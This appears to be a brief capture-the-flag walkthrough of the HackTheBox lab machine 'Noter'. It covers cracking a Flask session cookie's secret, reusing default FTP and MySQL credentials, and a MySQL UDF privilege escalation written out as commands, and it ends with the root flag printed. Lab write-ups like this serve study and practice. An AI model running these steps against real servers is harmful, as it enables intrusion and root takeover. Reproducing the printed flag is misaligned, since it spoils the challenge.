Noter
MediumMachineMar 13, 2026
10.10.11.160
#cookie#flask-unsign#ftp#privilege-escalation-via-library#mysql
Found a cookie on the site
cookie
eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoidGVzdCJ9.Yuv-mQ.bWKV_8puDmzqXSXV6rm3uYchhq4
Looks like a JWT token
flask-unsign
Using new tool flask-unsign flask-unsign
unsign the jwt token
┌[blackBox]─[12:29-04/08]─[/home/parsec/htb/noter]
└╼parsec$flask-unsign --unsign --wordlist /usr/share/wordlists/rockyou.txt --cookie 'eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoidGVzdCJ9.Yuv-mQ.bWKV_8puDmzqXSXV6rm3uYchhq4' --no-literal-eval
[*] Session decodes to: {'logged_in': True, 'username': 'test'}
[*] Starting brute-forcer with 8 threads..
[+] Found secret key after 17536 attempts
b'secret123'
with that we're able to test other usernames
we find username blue
and password in a note
then we find pdf of password policy about default passwords
then we login ftp_admin@Noter!
ftp
then we download backups and find DB creds
app.config['MYSQL_HOST'] = 'localhost'
app.config['MYSQL_USER'] = 'root'
app.config['MYSQL_PASSWORD'] = 'Nildogg36'
app.config['MYSQL_DB'] = 'app'
app.config['MYSQL_CURSORCLASS'] = 'DictCursor'
https://book.hacktricks.xyz/network-services-pentesting/pentesting-mysqlprivilege-escalation-via-library uploading our md hack we're able to get user shell
then using the mysql creds we're able to connect to the db as root
mysql
svc@noter:~$ mysql -u root -p
Enter password:
MariaDB [(none)]> use mysql;
MariaDB [mysql]> create table npn(line blob);
MariaDB [mysql]> insert into npn values(load_file('/home/svc/raptor_udf2.so'));
MariaDB [mysql]> select * from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/raptor_udf2.so';
MariaDB [mysql]> create function do_system returns integer soname 'raptor_udf2.so';
MariaDB [mysql]> select * from mysql.func;
MariaDB [mysql]> select do_system("cat /root/root.txt > /tmp/root.txt ; chmod 777 /tmp/root.txt");
MariaDB [mysql]> exit
Bye
svc@noter:/tmp$ cat root.txt$
Flags
Root Flag
85a33184f4b205a3c560a0fb7b5faa41Click to reveal root flag